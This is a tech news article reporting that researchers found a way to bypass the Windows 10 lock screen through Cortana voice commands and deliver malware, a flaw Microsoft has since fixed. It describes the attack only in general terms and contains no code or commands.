Tech

Microsoft’s Siri rival is causing huge security problems for Windows 10

Microsoft has resolved the issue, but more could be on the way.

Photo of Phillip Tracy

Phillip Tracy

windows 10 cortana voice assistant

Researchers discovered a way to bypass the Windows lock screen and infect a computer with malware using voice-commands via the Cortana virtual assistant.

Featured Video

First reported by Motherboard, independent researchers Tal Be’ery and Amichai Shulman noticed Cortana, which comes preinstalled on Windows 10, listens and responds to certain voice commands even after a computer goes to sleep. It does enough to let someone with physical access insert a USB drive and run malicious software.

Using voice commands, hackers can tell Cortana to open a web browser and pull up an unprotected webpage, or one that doesn’t encrypt web traffic. The USB network adapter then listens in and redirects the computer to another malicious website where malware downloads onto the system. All of this happens while the passcode-protected computer innocently displays its lock screen.

That’s not all. The hacker can then connect the computer to their Wi-Fi network by simply clicking on it, even when the machine is locked. Once a hacker gains control, they can use the computer to remotely spread malware to other nearby machines connected to the same local network. They do this by playing a sound file on the first infected computer that tells those machines to access a certain website. For example, it might say “Hey Cortana, go to Microsoft.com.” Using a proxy called Newspeak, the hackers can intercept all commands sent from nearby computers and redirect them to malicious sites.

Advertisement

You can get an idea of how a locked computer can be accessed via Cortana from this YouTube video Motherboard unearthed.

Microsoft fixed the vulnerability after the researchers informed them of the issue. Be’ery and Shulman told Motherboard that Cortana still responds to certain commands when locked, and they’re researching if other vulnerabilities exist.

We’ve seen hackers take over machines by infecting wireless accessories, like a keyboard or mouse. But the only incident we’re familiar with that involves voice assistants requires advanced techniques. In September, Scientists from China’s Zheijiang University published research demonstrating the use of ultrasonic, or inaudible high-frequency sounds, to break into voice assistants like Siri, Alexa, or Cortana. It’s an interesting technique, but not a viable method for most hackers.

Advertisement

The issue that plagued Windows machines is much more alarming and proves that even the latest technologies create new security vulnerabilities for hackers to exploit.

 
The Daily Dot